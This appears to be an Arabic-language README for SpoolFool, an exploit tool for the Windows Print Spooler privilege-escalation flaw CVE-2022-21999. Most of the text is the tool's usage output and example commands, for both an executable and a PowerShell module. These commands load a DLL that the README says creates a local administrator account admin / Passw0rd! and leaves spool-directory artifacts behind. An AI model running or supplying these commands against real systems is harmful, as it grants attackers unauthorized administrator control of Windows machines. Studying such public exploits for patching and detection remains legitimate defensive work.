
استغلال لثغرة CVE-2022-21999 - ثغرة رفع الامتيازات في Windows Print Spooler (LPE)
استغلال لثغرة CVE-2022-21999 - ثغرة رفع الامتيازات في Windows Print Spooler (LPE)
يجب أن يعمل الاستغلال المقدم بشكل افتراضي على جميع إصدارات سطح المكتب من Windows.
يرجى الاطلاع على منشور المدونة للحصول على التفاصيل الفنية الكاملة هنا.
PS C:\SpoolFool> .\SpoolFool.exe
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
C:\SpoolFool\SpoolFool.exe -dll add_user.dll
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
-dll add_user.dll
-dll add_user.dll -printer 'My Printer'
-dll add_user.dll -dir 'SECRET'
-dll add_user.dll -printer 'My Printer' -dir 'SECRET'
يستخدم إثبات المفهوم التالي ملف DLL لإنشاء مسؤول محلي جديد admin / Passw0rd!. يمكن العثور على ملف DLL (AddUser.dll) والكود المصدري في هذا المستودع.

التشغيل الثاني
يوضح إثبات المفهوم التالي تشغيلًا ثانيًا للاستغلال المقدم. لاحظ أن الثغرة لا تُستغل هذه المرة من أجل تحميل ملف DLL.

بعد تنفيذ الاستغلال، ستُترك المخلفات التالية للتنظيف لاحقًا:
SpoolDirectory للطابعة المستهدفة